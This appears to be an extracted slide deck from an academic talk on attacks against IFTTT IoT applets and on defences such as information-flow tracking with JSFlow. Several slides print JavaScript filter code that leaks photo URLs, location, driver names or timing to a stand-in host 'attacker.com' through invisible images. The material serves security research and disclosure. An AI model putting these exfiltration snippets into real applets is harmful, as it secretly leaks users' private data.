Breaking and Fixing IoT Apps Andrei Sabelfeld Joint work with Iulia - - PowerPoint PPT Presentation

Breaking and Fixing IoT Apps

Joint work with Iulia Bastys and Musard Balliu Appeared in CCS’18

Andrei Sabelfeld

Web of Things

“World Wide Web Consortium (W3C) is in a unique position to create the royalty-free and platform-independent standards needed to overcome the fragmentation of the IoT”

• W3C CEO Dr. Jeff Jaffe, 2017

Security implications? Internet of Things (IoT)

• Incompatible standards, platforms, technologies

IoT apps

“Connecting otherwise unconnected services”

IoT apps

• “Managing users’ digital lives”
• Smart homes, smartphones, cars, fitness armbands
• Online services (Google, Dropbox,…)
• Social networks (Facebook, Twitter,…)
• End-user programming
• Anyone can create and publish apps
• Most apps by third parties
• Web interface + smartphone clients

IFTTT “If This Then That”

• Trigger-action programming
• Largest IoT app platform
• Over 500 integrated services
• Millions of users and billions of running apps

IFTTT app If this then that

Trigger

Action What can go wrong? J

Attack by malicious app maker

If then

IFTTT app If this then that

Trigger

Action What can go wrong? J

Attack by malicious app maker

If then

IFTTT’s access control If this then that

Trigger

Action Users explicitly grant the app access JavaScript “sandboxed”

URLs as universal glue If this then that

Trigger

Action

1.Upload new image file to IFTTT

• 2. Put up image

under public URL

• n ifttt.com
• 3. Pass URL to

Google Drive API for upload to Google

“Connecting otherwise unconnected services”

How to exfiltrate secrets?

• Private information available via APIs
• Private sources: Location, voice commands, images,…
• Cannot directly exfiltrate from filter code
• Public sinks?
• Batch job programs with no I/O
• “Can load the gun but not pull the trigger….”

URL attacks

• “Load the gun and let somebody else pull the trigger”
• URL upload attack
• PhotoURL
• 'https://attacker.com?'+encodeURIComponent(PhotoURL)
• URL markup attack
• Include an invisible image
• ’<img src=\"https://attacker.com?’ + secret + '\" style=\"width:0px;height:0px;\">’

URL upload attack demo

URL markup attack demo

3rd-party applet attack surface

If then …

Privacy Integrity & availability

Empirical measurement study

• Dataset by Mi et al. (May 2017)
• 279,828 IFTTT app data: triggers and actions used
• Classification of triggers and actions
• Privacy, Integrity & Availability
• Per category
• Classification of applets
• Private sources & public sink potential privacy violation
• High integrity sink potential integrity violation
• Possibility of skipping trigger potential denial of service
• 30% of apps potentially vulnerable

IFTTT triggers

50 100 150 200 appliances blogging bookmarking business tools calendars & scheduling cloud storage communication connected car contacts developer tools diy electronics email environment control & monitoring finance & payments health & fitness journaling & personal data location mobile devices & accessories music news & information notes notifications photo & video power monitoring & management security & monitoring systems shopping smart hubs & systems social networks survey tools tags & beacons task management & to-dos time management & tracking voice assistants

Number of triggers per category

Private Available Public

IFTTT actions

20 40 60 80 100 120 140 160 180 appliances blogging bookmarking business tools calendars & scheduling cloud storage communication connected car contacts developer tools diy electronics email environment control & monitoring gardening health & fitness journaling & personal data lighting mobile devices & accessories music news & information notes notifications pet trackers photo & video power monitoring & management routers & computer accessories security & monitoring systems shopping smart hubs & systems social networks survey tools task management & to-dos time management & tracking television & cable tags & beacons

Cumulative number of actions per category

Public Untrusted Available

appliances blogging bookmarking business tools calendars & scheduling cloud storage communication connected car contacts developer tools diy electronics education email environment control & monitoring finance & payments health & fitness journaling & personal data lighting location mobile devices & accessories music news & information notes notifications photo & video power monitoring & management routers & computer accessories security & monitoring systems shopping smart hubs & systems social networks survey tools tags & beacons task management & to-dos time management & tracking voice assistants appliances blogging bookmarking business tools calendars & scheduling cloud storage communication connected car contacts developer tools diy electronics education email environment control & monitoring finance & payments health & fitness journaling & personal data lighting location mobile devices & accessories music news & information notes notifications photo & video power monitoring & management routers & computer accessories security & monitoring systems shopping smart hubs & systems social networks survey tools tags & beacons task management & to-dos time management & tracking voice assistants

200 400 600 800 1000

Potential privacy violations

URL shortening attack demo

Countermeasures: break the flow

• Per-app access control
• Public app: no private sources
• Private app: no public sinks
• Cannot build URLs from strings, only via APIs
• Output sanitization
• Authenticated communication
• Protect resources on CDNs by requiring

authentication

• If public URLs can’t be avoided
• Shorten URL lifetime; already done by some CDNs
• Secure URL shortening: 11-12 chars best practice

If then

Public app

Private app

If then

Countermeasures: track the flow

If then

JSFlow

• Track information flow in

JavaScript code

• Allow flow from public sources

to attacker

• Logo image with public URL
• Block flow from private sources to

attacker

• Location leaks prevented
• JSFlow
• Information flow tracker for JavaScript
• ECMA-262 v.5 support
• jsflow.net

Types of flow: explicit

APPLET TITLE

Automatically back up your new iOS photos to Google Drive

TRIGGER

Any new photo

ACTION

Upload file from URL

var publicPhotoURL = encodeURIComponent(IosPhotos.newPhotoInCameraRoll.PublicPhotoURL); var attack = ‘www.attacker.com?’ + publicPhotoURL; GoogleDrive.uploadFileFromUrlGoogleDrive.setUrl(attack); FILTER & TRANSFORM

26

Types of flow: explicit

APPLET TITLE

Automatically back up your new iOS photos to Google Drive

TRIGGER

Any new photo

ACTION

Upload file from URL

var publicPhotoURL = encodeURIComponent(IosPhotos.newPhotoInCameraRoll.PublicPhotoURL); var attack = ‘www.attacker.com?’ + publicPhotoURL; GoogleDrive.uploadFileFromUrlGoogleDrive.setUrl(attack); FILTER & TRANSFORM

27

Types of flow: explicit

APPLET TITLE

Automatically get an email every time you park your BMW with a map

TRIGGER

Car is parked

ACTION

Send me an email

var loc = encodeURIComponent(Location.enterOrExitRegionLocation.LocationMapUrl); var locImg = ‘<img src=\”’ + Location.enterOrExitRegionLocation.LocationMapUrl + ‘\”>’; var attack = ‘<img src=\”www.attacker.com?’ + loc + ‘\” style=\” width:0px; height:0px; \”>’; var iftttLogo = ‘<img src=\”www.ifttt.com/logo.png” style=\” width:100px; height:100px; \”>’; Email.sendMeEmail.setBody(‘I ‘ + Location.enterOrExitRegionLocation.EnteredOrExited + ‘ an area ’ + locImg + iftttLogo + attack); FILTER & TRANSFORM

28

Types of flow: explicit

APPLET TITLE

Automatically get an email every time you park your BMW with a map

TRIGGER

Car is parked

ACTION

Send me an email

var loc = encodeURIComponent(Location.enterOrExitRegionLocation.LocationMapUrl); var locImg = ‘<img src=\”’ + Location.enterOrExitRegionLocation.LocationMapUrl + ‘\”>’; var attack = ‘<img src=\”www.attacker.com?’ + loc + ‘\” style=\” width:0px; height:0px; \”>’; var iftttLogo = ‘<img src=\”www.ifttt.com/logo.png” style=\” width:100px; height:100px; \”>’; Email.sendMeEmail.setBody(‘I ‘ + Location.enterOrExitRegionLocation.EnteredOrExited + ‘ an area ’ + locImg + iftttLogo + attack); FILTER & TRANSFORM

29

Types of flow: implicit

APPLET TITLE

Log your completed rides in Google Calendar

TRIGGER

Ride completed

ACTION

Quick add event

var rideMap = Uber.rideCompleted.TripMapImage; var driver = Uber.rideCompleted.DriverName; for (i = 0; i < driver.length; i++) for (j = 32; j < 127; j++){ t = driver[i] == String.fromCharCode(j); if (t) { dst[i] = String.fromCharCode(j); } } var attack = ‘<img src=\”www.attacker.com?’ + dst + ‘\” style=\” width:0px; height:0px; \”>’; GoogleCalendar.quickAddEvent.setQuickAdd(rideMap + attack); FILTER & TRANSFORM

30

Types of flow: implicit

APPLET TITLE

Log your completed rides in Google Calendar

TRIGGER

Ride completed

ACTION

Quick add event

var rideMap = Uber.rideCompleted.TripMapImage; var driver = Uber.rideCompleted.DriverName; for (i = 0; i < driver.length; i++) for (j = 32; j < 127; j++){ t = driver[i] == String.fromCharCode(j); if (t) { dst[i] = String.fromCharCode(j); } } var attack = ‘<img src=\”www.attacker.com?’ + dst + ‘\” style=\” width:0px; height:0px; \”>’; GoogleCalendar.quickAddEvent.setQuickAdd(rideMap + attack); FILTER & TRANSFORM

31

Types of flow: presence

APPLET TITLE

Get an email alert when your kids come home and connect to Almond

TRIGGER

A device has connected

ACTION

Send me an email

var logo = ‘<img src=\”www.logo.com/350x150” style=\” width:100px; height:100px; \”>’; Email.sendAnEmail.setBody(“Your kids just got home. ” + logo); FILTER & TRANSFORM

32

Types of flow: timing

APPLET TITLE

Automatically log your new Stripe payments to a Google spreadsheet

TRIGGER

New payment received

ACTION

Add row to spreadsheet

var attack = ‘<img src=\”www.attacker.com” style=\” width:0px; height:0px; \”>’; var n = parseInt(Stripe.newPayment.Amount); while (n > 0) { n--; } GoogleSheets.appendToGoogleSpreadsheet.setFormattedRow(‘New Stripe payment ’ + Stripe.newPayment.Amount + attack); FILTER & TRANSFORM

33

Types of flow: timing

APPLET TITLE

Automatically log your new Stripe payments to a Google spreadsheet

TRIGGER

New payment received

ACTION

Add row to spreadsheet

var attack = ‘<img src=\”www.attacker.com” style=\” width:0px; height:0px; \”>’; var n = parseInt(Stripe.newPayment.Amount); while (n > 0) { n--; } GoogleSheets.appendToGoogleSpreadsheet.setFormattedRow(‘New Stripe payment ’ + Stripe.newPayment.Amount + attack); FILTER & TRANSFORM

34

Types of flow

www.attacker.com?privateData www.ifttt.com/logo.png www.attacker.com www.logo.com/350x150 ... ... explicit implicit presence timing

35

Security policy

www.attacker.com?privateData www.ifttt.com/logo

www.ifttt.com www.attacker.com www.logo.com

Whitelist Blacklist

www.attacker.com www.logo.com/350x150

36

www.google.com

Security policy Attacker’s view

Attacker’s view

‘<img src=\”www.attacker.com?’ + loc + ‘\” style=\” width:0px; height:0px; \”>’|A =

[ www.attacker.com?loc ]

‘<img src=\”www.ifttt.com/logo” style=\” width:100px; height:100px; \”>’|A = ∅ ‘<img src=\”www.attacker.com?’ + dst + ‘\” style=\” width:0px; height:0px; \”>’|A =

[ www.attacker.com?dst ]

‘<img src=\”www.logo.com/350x150” style=\” width:100px; height:100px; \”>’|A =

[ www.logo.com?350x150 ]

37

Projected security

~A

38

Indistinguishability by attacker

string1 ~A string2 if string1|A = string2|A

Vision

I

F

C

Insecure flow from Uber.rideCompleted.DriverName to www.attacker.com.

39

Automated vetting

timing

Static enforcement: type system Dynamic enforcement: dynamic monitor

Tracking the flow

explicit implicit explicit implicit presence

40

Static enforcement

41

Flow-sensitive security type system Flow-insensitive write effects Flow-sensitive read effects

imgLoc = img(h); attack = img(b + h); sink(imgLoc + attack);

Static enforcement

logo = img(w1); if (h1) { logo = img(w2); } sink(h2 + logo); SECURE logo = img(b1); if (h1) { logo = img(b2); } sink(h2 + logo); INSECURE

presence timing

NOT HANDLED

42

INSECURE

Dynamic enforcement

43

Single label Step counter

• JSFlow-based implementation
• Evaluation on 60 apps
• 30 secure and 30 insecure
• Popular apps modelled
• Filter code from forums
• No false negatives
• Single false positive (on “artificial” filter code)

JSFlow

Dynamic enforcement: presence & timing

triggering the app is sensitive & no timeout ⟹ no blacklisted URLs on the sink triggering the applet is not sensitive & no timeout ⟹ monitor flows in the filter code

44

attack = img(b); while (h1 > 0) { h1--; } sink(h2 + attack); INSECURE

Dynamic enforcement

logo = img(b); sink(“Your kids are home.” + logo); unless you park at hospital INSECURE INSECURE INSECURE SECURE

45

INSECURE

Coordinated disclosure

Conclusions

• IoT apps increasingly popular
• IFTTT, Zapier, Microsoft Flow
• Vulnerable to attacks by malicious makers
• URL upload
• URL markup
• URL shortening
• Empirical study
• 30% of IFTTT apps may violate privacy unnoticeably to users
• Countermeasures
• Short/medium-term: breaking the flow
• Long-term: tracking the flow

If then

JSFlow

http://ifc-challenge.appspot.com/ Information flow challenge